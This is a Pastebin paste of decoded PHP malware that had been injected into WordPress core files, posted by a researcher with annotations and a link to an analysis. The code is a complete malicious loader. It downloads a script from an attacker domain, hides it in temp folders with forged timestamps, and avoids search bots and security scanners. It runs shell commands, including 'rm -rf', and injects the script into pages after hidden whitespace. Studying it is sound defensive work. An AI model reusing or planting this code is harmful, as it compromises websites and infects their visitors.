Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //======================================================================================
- // Decoded version of the malicious PHP code injected into random WordPress files in the
- // wp-includes directory.
- //
- // Detailed description of the attack can be found here:
- // http://blog.UnmaskParasites.com/2012/07/11/whats-in-your-wp-head/
- //======================================================================================
- if (!function_exists('check_wp_head_load')){
- function check_wp_head_load(){
- if (!function_exists('downloadURL')){
- function downloadURL($url){
- $user_agent1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
- if (function_exists('curl_init')){
- $curlHandler = curl_init();
- curl_setopt($curlHandler, CURLOPT_URL, $url);
- curl_setopt($curlHandler, CURLOPT_HEADER, 0);
- curl_setopt($curlHandler, CURLOPT_TIMEOUT, 30);
- curl_setopt($curlHandler, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curlHandler, CURLOPT_USERAGENT, $user_agent1);
- if (!(@ini_get("safe_mode") || @ini_get("open_basedir"))){
- @curl_setopt($curlHandler, CURLOPT_FOLLOWLOCATION, 1);
- }
- @curl_setopt($curlHandler, CURLOPT_MAXREDIRS, 2);
- $curlResult = curl_exec($curlHandler);
- curl_close($curlHandler);
- if ($curlResult !== false){
- return $curlResult;
- }
- }
- else if(function_exists('fsockopen')){
- global $yO_4;
- $url = str_replace("http://", "", $url);
- if (preg_match("#/#", "$url")){
- $yO_5 = $url;
- $url = @explode("/", $url);
- $url = $url[0];
- $yO_5 = str_replace($url, "", $yO_5);
- if (!$yO_5 || $yO_5 == ""){
- $yO_5 = "/";
- }
- $yO_6 = gethostbyname($url);
- }
- else {
- $yO_6 = gethostbyname($url);
- $yO_5 = "/";
- }
- $yO_7 = fsockopen($yO_6, 80, $yO_8, $yO_9, 10);
- stream_set_timeout($yO_7, 10);
- if ($yO_7){
- $yO_10 = "GET $yO_5 HTTP/1.0\r\n";
- $yO_10 .= "Host: $url\r\n";
- $yO_10 .= "Referer: http://$url$yO_5\r\n";
- $yO_10 .= "Accept-Language: en-us, en;q=0.50\r\n";
- $yO_10 .= "User-Agent: $UA\r\n";
- $yO_10 .= "Connection: Close\r\n\r\n";
- fputs($yO_7, $yO_10);
- while (!feof($yO_7)){
- $yO_11 .= fgets($yO_7, 4096);
- }
- fclose($yO_7);
- $yO_11 = @explode("\r\n\r\n", $yO_11, 2);
- $yO_12 = $yO_11[0];
- if ($yO_4){
- $yO_12 = "$yO_4<br /><br />\n$yO_12";
- }
- $yO_12 = str_replace("\n", "<br />", $yO_12);
- if ($yO_11[1]){
- $yO_13=$yO_11[1];
- }
- else{
- $yO_13 = "";
- }
- if ($yO_13){
- $yO_11 = $yO_13;
- }
- else {
- $yO_11 = $yO_12;
- }
- if (preg_match("/Location\:/", "$yO_12")){
- $url = @explode("Location: ", $yO_12);
- $url = $url[1];
- $url = @explode("\r", $url);
- $url = $url[0];
- $yO_4 = str_replace("\r\n\r\n", "",$yO_12);
- $yO_14 = "Location:";//location:
- $yO_4 = str_replace("Location:",$yO_14,$yO_4);
- return downloadURL($url);
- }
- else{
- return $yO_11;
- }
- }
- }
- else {
- echo "ERROR";
- exit;
- }
- }
- }
- if (!function_exists('detectBots')){
- function detectBots($ua, $remoteIP){ // I deliberately left the arrays of IP rages and UAs incompletely detecoded
- $bot_IPs = array("66\.249\.[6-9][0-9]\.[0-9]+",y0(26),y0(27),y0(28),y0(29),y0(30),y0(31),y0(32),
- y0(33),y0(34),y0(35),y0(36),y0(37),y0(38),y0(39),y0(40),
- y0(41),y0(42),y0(43),y0(44),y0(45),y0(46),y0(47),y0(48),
- y0(49),y0(50),y0(51),y0(52),y0(53),y0(54),y0(55),y0(56),
- y0(57),y0(58),y0(59),y0(60),y0(61),y0(62),y0(63),y0(64),
- y0(65),y0(66),y0(67),y0(68),y0(69),y0(70),y0(71),y0(72),
- y0(73),y0(74),y0(75),y0(76),y0(77),y0(78),y0(79),y0(80),
- y0(81),y0(82),y0(83),y0(84),y0(85),y0(86),y0(87),y0(88),
- y0(89),y0(90),y0(91),y0(92),y0(93),y0(94),y0(95),y0(96),
- y0(97),y0(98),y0(99),y0(100),y0(101),y0(102),y0(103),y0(104),
- y0(105),"118\.169\.40\.20");
- $bot_UAs = array("http", "google",y0(109),y0(110),
- y0(111),y0(112),y0(113),y0(114),y0(115),y0(116),y0(117),y0(118),
- y0(119),y0(120),y0(121),y0(122),y0(123),y0(124),y0(125),y0(126),
- y0(127),y0(128), "yandex", "trend", "virus", "malware", "wget");
- $ua = preg_replace("|User\.Agent\:[\s ]?|i", "", $ua);
- $notBot = true;
- foreach ($bot_IPs as $yO_20)
- if (eregi("$yO_20", $remoteIP)){
- $notBot = false;
- break;
- }
- if ($notBot)
- foreach ($bot_UAs as $yO_21)
- if (eregi($yO_21, $ua)!== false){
- $notBot = false;
- break;
- }
- if ($notBot and !eregi("^[a-zA-Z]{5,}", $ua)){
- $notBot = false;
- }
- if ($notBot and strlen($ua) <= 11){
- $notBot = false;
- }
- return $notBot;
- }
- }
- if (!function_exists('rm_rf_file')){ // clear directory
- function rm_rf_file($dirname){
- $modTime = filemtime($dirname);
- if ($yO_24 = opendir($dirname)){
- while (false !==($afile = readdir($yO_24))){
- if ($afile != "." && $afile != ".." && is_file($afile)){
- chmod($afile, 438); //0666
- unlink($afile);
- }
- }
- closedir($yO_24);
- }
- touch($dirname, $modTime, $modTime);
- }
- }
- if (!function_exists('tier')){ //"http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- function tier($yO_26, $yO_27, $yO_28){
- //$yO_26 = array("ZW5k", "edo", "ced", "/", "_", "esab", "strr", "ten", "ev", "dGVu", "ptth", ":", ".");
- //$yO_27 = "base64_decode"
- //$yO_28 = "strrev"
- $yO_29 = mt_rand(0, 4);
- $yO_30 = $yO_28( $yO_26[7] );//net
- $yO_31 = "end";
- $request_uri = @$_SERVER["REQUEST_URI"];
- $yO_33 = "base64_encode";
- $host = @$_SERVER["HTTP_HOST"];
- return "http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- //net00net.net, net11net.net, net22net.net, net33net.net, net44net.net //178.162.129.170 Hessen - Frankfurt - Leaseweb Germany Gmbh Creation Date: 20-May-2012 Expiration Date: 20-May-2013
- }
- }
- if (!function_exists('sys_get_temp_dir')){
- function sys_get_temp_dir(){
- if ($yO_35 = getenv( "TMP" ) )
- return $yO_35;
- if ( $yO_35 = getenv("TEMP") )
- return $yO_35;
- if ($yO_35 = getenv("TMPDIR"))
- return $yO_35;
- $yO_35 = tempnam(__FILE__, "");
- if (file_exists($yO_35)){
- unlink($yO_35);
- return dirname($yO_35);
- }
- return false;
- }
- }
- if (!function_exists('execCommand')){
- function execCommand($command){
- $execResult = "";
- if (!empty($command)){
- if (function_exists('exec')){
- @exec($command, $execResult);
- $execResult = join("\n", $execResult);
- }
- elseif (function_exists('shell_exec')){
- $execResult=@shell_exec($command);
- }
- elseif (function_exists('system')) {
- @ob_start();
- @system($command);
- $execResult = @ob_get_contents();
- @ob_end_clean();
- }
- elseif (function_exists('passthru')){
- @ob_start();
- @passthru($command);
- $execResult = @ob_get_contents();
- @ob_end_clean();
- }
- elseif ( @is_resource($yO_38=@popen($command, "r")) ){
- $execResult = "";
- while(!@feof($yO_38)){
- $execResult .=@fread($yO_38, 1024);
- }
- @pclose($yO_38);
- }
- elseif (@function_exists('proc_open') && @is_resource($yO_38=@proc_open($command,array(1) => array("pipe", "w")),$yO_39))){
- $execResult = "";
- if (@function_exists('fread') && @function_exists('feof')){
- while (!@feof($yO_39[1])){
- $execResult .= @fread($yO_39[1], 1024);
- }
- }
- else if (@function_exists('fgets') && @function_exists('feof')){
- while (!@feof($yO_39[1])){
- $execResult .=@fgets($yO_39[1], 1024);
- }
- }
- @proc_close($yO_38);
- }
- }
- return htmlspecialchars($execResult);
- }
- }
- $lonly = "lonly";
- $remoteAddress = $_SERVER["REMOTE_ADDR"];
- $UA = $_SERVER["HTTP_USER_AGENT"];
- $scriptFile = $_SERVER["SCRIPT_FILENAME"];
- $yO_43 = strtolower($UA);
- if ($remoteAddress == "" || $UA == "" || $scriptFile == "") // unnatural requests
- return null;
- $yO_26 = array("ZW5k", "edo", "ced", "/", "_", "esab", "strr", "ten", "ev", "dGVu", "ptth", ":", ".");
- if (!isset($_COOKIE[$lonly])){
- $tmpDir = @sys_get_temp_dir();
- if (!$tmpDir){
- $tmpDir = dirname($scriptFile);
- $newTmpDir = $tmpDir ."/.tmp";
- }
- else {
- $newTmpDir=$tmpDir ."/.tmp";
- if (!@file_exists($newTmpDir)){
- $modTime = @filemtime($tmpDir);
- @mkdir($newTmpDir);
- $yO_46 = @fopen("$newTmpDir/r", "w"); //test creating a file
- @fwrite($yO_46, "");
- @fclose($yO_46);
- @chmod($newTmpDir, 511); //0777
- @touch("$newTmpDir/r", $modTime, $modTime);
- @touch($tmpDir, $modTime, $modTime);
- @touch($newTmpDir, $modTime, $modTime);
- if (!@file_exists("$newTmpDir/r")){
- $tmpDir = dirname($scriptFile);
- $newTmpDir = $tmpDir ."/.cache";
- }
- }
- }
- $yO_28 = "strrev";
- if (!@file_exists($newTmpDir)) { //create $newTmpDir if it doesn't exist
- $modTime = @filemtime($tmpDir);
- @mkdir($newTmpDir);
- @chmod($newTmpDir, 511); //0777
- @touch($tmpDir, $modTime, $modTime);
- @touch($newTmpDir, $modTime, $modTime);
- }
- $timeStr = @date("Hi"); // hours minutes
- $yO_48 = @date("ymd"); // yymmdd
- $dateTmpFile = "$newTmpDir/$yO_48";
- $date_Tmp_File = "$newTmpDir/tmp_$yO_48";
- $dayAgo = $yO_48-1;
- $yO_27 = "base64_decode";
- // remove yesterday's files in $newTmpDir every day and all files 3 times a day
- if (@file_exists("$newTmpDir/tmp_$dayAgo") || ($timeStr >= "0000" && $timeStr <= "0001") || ($timeStr >= "1200" && $timeStr <= "1201") || ($timeStr >= "1800" && $timeStr <= "1801")){
- @rm_rf_file($newTmpDir);
- @execCommand("rm -rf $newTmpDir/*");
- }
- if (!@file_exists($dateTmpFile)) { //create $dateTmpFile if it doesn;t exist
- $modTime = @filemtime($newTmpDir);
- $yO_46 = @fopen($dateTmpFile, "w");
- @fclose($yO_46);
- @chmod($dateTmpFile, 511); //777
- @touch($newTmpDir, $modTime, $modTime);
- }
- if (@is_writable($newTmpDir) && (!@file_exists($date_Tmp_File) || @filesize($date_Tmp_File) < 5)){
- $payload = @downloadURL( tier($yO_26, $yO_27, $yO_28) ); //"http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- if ($payload != "ERROR" && base64_decode($payload)!== false){ // write downloaded payload to tmp_yymmdd
- $modTime = @filemtime($newTmpDir);
- $yO_46 = @fopen($date_Tmp_File, "w");
- @fwrite($yO_46, "$payload");
- @fclose($yO_46);
- @chmod($date_Tmp_File, 511); //777
- @touch($newTmpDir, $modTime, $modTime);
- @touch($date_Tmp_File, $modTime, $modTime);
- }
- else return null;
- }
- $decodedPayload = @base64_decode( @file_get_contents($date_Tmp_File) );
- $yO_54 = @file($dateTmpFile);
- $returningVisitor = false;
- foreach ($yO_54 as $yO_56){ //detect returning visitors
- if (@trim($yO_56) == $remoteAddress){
- $returningVisitor = true;
- break;
- }
- }
- $notBot = @detectBots($UA, $remoteAddress);
- if ($returningVisitor == false && $notBot == true){
- $yO_46 = @fopen($dateTmpFile, "a");
- @fwrite($yO_46, "$remoteAddress\n"); // record visitor's IP
- @fclose($yO_46);
- //inject a malicious script after a few hundred whitespaces.
- echo "\n" .str_repeat(" ", mt_rand(300,1000)) ."<script type='text/javascript'>$decodedPayload</script>\n";
- }
- }
- }
- }
- $lonly = "lonly";
- if (!isset($_COOKIE[$lonly]))
- @add_action("wp_head", "check_wp_head_load", mt_rand(1, 6));
Add Comment
Please, Sign In to add comment